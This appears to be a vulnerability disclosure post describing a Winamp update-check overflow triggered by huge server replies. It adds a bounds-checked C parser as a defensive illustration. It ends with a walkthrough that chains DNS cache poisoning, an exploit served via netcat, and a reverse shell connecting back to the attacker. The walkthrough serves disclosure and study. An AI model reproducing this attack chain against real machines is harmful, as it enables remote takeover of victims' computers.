Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and then notifies the user of
a possible upgrade via a message box.
Unfortunately, if it receives a huge response, the thread parsing the
data is thrown into an infinite loop and eventually the exception
dispatcher is called, and then, as is usually the case under Windows,
a big, bad overflow occurs. I am attaching the real example.
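The failure mode above is an unbounded parse of an attacker-sized reply into a fixed buffer. As an added illustration (not Winamp's code; the "version=..." reply format is constructed for the example), this is how a version-check parser closes each of the three holes: a hard cap on reply size, a loop bounded by the input end, and a length check on the destination buffer.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REPLY   4096   /* anything bigger than a sane update reply is refused */
#define VERSION_MAX 16     /* fixed destination buffer, as a version string needs */
/* Parse a constructed update-check reply of the form "version=2.77\r\n" into
 * out[]. Returns 0 on success, -1 if the reply is malformed, too large, or
 * would not fit. Every check maps to one failure mode described above. */
int parse_update_reply(const char *reply, size_t len, char *out, size_t outsz)
{
    const char *key = "version=";
    size_t klen = strlen(key), n = 0;
    if (reply == NULL || out == NULL || outsz == 0) return -1;
    if (len > MAX_REPLY) return -1;                /* huge response: reject it */
    if (len < klen || memcmp(reply, key, klen) != 0) return -1;
    const char *p = reply + klen, *end = reply + len;
    /* Bounded loop: p advances on every pass and stops at the end of the
     * input, so an enormous body cannot spin the parser forever. */
    while (p < end && *p != '\r' && *p != '\n') {
        if (n + 1 >= outsz) return -1;             /* would overflow out[] */
        out[n++] = *p++;
    }
    out[n] = '\0';
    return n > 0 ? 0 : -1;
}

/* Build a constructed reply of `len` bytes ("version=" then filler) and return
 * the parser's verdict, to exercise normal, over-long and oversized bodies. */
int check_reply_of_length(size_t len)
{
    static char buf[MAX_REPLY * 4];
    char version[VERSION_MAX];
    if (len > sizeof buf) return -1;
    memset(buf, 'A', len);
    if (len >= 8) memcpy(buf, "version=", 8);
    return parse_update_reply(buf, len, version, sizeof version);
}

int main(void)
{
    char version[VERSION_MAX];
    const char *ok = "version=2.77\r\n";
    if (parse_update_reply(ok, strlen(ok), version, sizeof version) == 0)
        printf("parsed version %s\n", version);
    printf("100-byte body: %d, 16384-byte body: %d\n",
           check_reply_of_length(100), check_reply_of_length(16384));
    return 0;
}
```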
Sample attack
=============
Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2
1) attacker poisons nameserver cache
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
2) victim is now resolving www.winamp.com to attacker machine
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Address: 192.168.1.2
3) attacker fires up exploit as web daemon
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
4) attacker waits for connect-back by exploit
192.168.1.2:
x@x:~$ nc -l -p 5555
5) foolish winamp user opens winamp!
192.168.0.2:
opens winamp, prepares for The Weather Girls - It's Raining Men.mp3
6) BOOJAH!@
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
/// control over machine taken